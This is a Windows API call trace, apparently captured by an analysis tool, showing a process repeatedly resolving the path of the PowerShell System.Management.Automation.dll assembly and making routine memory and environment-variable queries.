	[0041.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.211] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.212] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.213] GetLastError () returned 0xcb
	[0041.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.219] GetLastError () returned 0xcb
	[0041.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.219] GetLastError () returned 0xcb
	[0041.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.219] GetLastError () returned 0xcb
	[0041.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.219] GetLastError () returned 0xcb
	[0041.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.254] GetLastError () returned 0xcb
	[0041.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.254] GetLastError () returned 0xcb
	[0041.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.254] GetLastError () returned 0xcb
	[0041.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d754, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.254] GetLastError () returned 0xcb
	[0041.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.254] GetLastError () returned 0xcb
	[0041.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0041.254] GetLastError () returned 0xcb
	[0041.254] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0041.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.256] GetLastError () returned 0xcb
	[0041.260] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0041.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.281] GetLastError () returned 0xcb
	[0041.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.283] GetLastError () returned 0xcb
	[0041.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.285] GetLastError () returned 0xcb
	[0041.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.288] GetLastError () returned 0xcb
	[0041.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.290] GetLastError () returned 0xcb
	[0041.292] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0041.293] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0041.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.350] GetLastError () returned 0xcb
	[0041.385] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0041.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0041.390] GetLastError () returned 0xcb
	[0042.108] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x16db40
	[0042.108] GetLastError () returned 0x0
	[0042.109] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x16dbc8
	[0042.109] GetLastError () returned 0x0
	[0042.298] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.340] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.342] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.343] VirtualQuery (in: lpAddress=0x25c334, lpBuffer=0x25d334, dwLength=0x1c | out: lpBuffer=0x25d334*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.361] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.361] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.361] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.361] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.362] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.363] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.364] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.365] VirtualQuery (in: lpAddress=0x25cc80, lpBuffer=0x25dc80, dwLength=0x1c | out: lpBuffer=0x25dc80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0042.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.368] GetLastError () returned 0xcb
	[0042.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
